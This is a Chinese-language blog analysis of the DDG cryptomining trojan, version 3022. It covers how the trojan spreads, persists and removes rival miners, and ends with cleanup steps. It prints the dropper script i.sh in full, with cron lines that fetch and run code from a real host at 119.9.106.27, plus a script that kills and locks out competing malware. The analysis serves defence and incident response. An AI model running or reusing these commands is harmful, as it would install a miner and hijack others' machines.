一、下载
下载脚本:http://119.9.106.27:8000/i.sh(i.sh名称位ddgs一贯的作风)
样本地址:119.9.106.27:8000/static/3022/
首先下载i.sh脚本分析下里边的内容
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -echo "" > /var/spool/cron/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootcd /tmp touch /usr/local/bin/writeable && cd /usr/local/bin/ touch /usr/libexec/writeable && cd /usr/libexec/ touch /usr/bin/writeable && cd /usr/bin/ rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd) ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce if [ ! -f "lrnbbce" ]; thenwget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce fi chmod +x lrnbbce $(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbceps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9`
ddg木马的老套路了,写环境变量、添加到定时任务、下载矿机执行、删除禁用其他挖矿木马(挖矿行业竞争很激烈了)
从3014版本开始增加了云端配置下发 disable.sh 来集中干掉竞争对手,
脚本地址:http://119.9.106.27:8000/static/disable.sh,内容如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinuxif [ -e "/tmp/gates.lod" ]; thenrm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)kill -9 $(cat /tmp/gates.lod)rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)kill -9 $(cat /tmp/moni.lod)rm -rf /tmp/{gates,moni}.lod
fips auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
把同类的挖矿进程放到了这个脚本中,来杀掉yilu、以及BillGate家族的gates进程等
不过这都是之前版本的,现在这个更高级了,直接下发二进制程序disable
这个disable的作用可以参考下360的那篇文章:图片来自360netlab博客
目前为了阻止其它挖矿程序ddg3022主要做了以下措施
1.修改Hosts文件,阻止其它挖矿程序的下发
2.杀掉其它挖矿程序
3.使用二进制文件disable
接下来执行脚本开始我们的复现过程 ,crontab已经写入
CPU已经满载,挖矿程序已经在运行
三、清除
老套路,挖矿木马干什么咱们反着来就是了
删除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce
kill掉进程:6Tx3Wq,lrnbbce
此时挖矿程序已经清理,后续可以删除被增加的hosts等文件
参考文章:
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
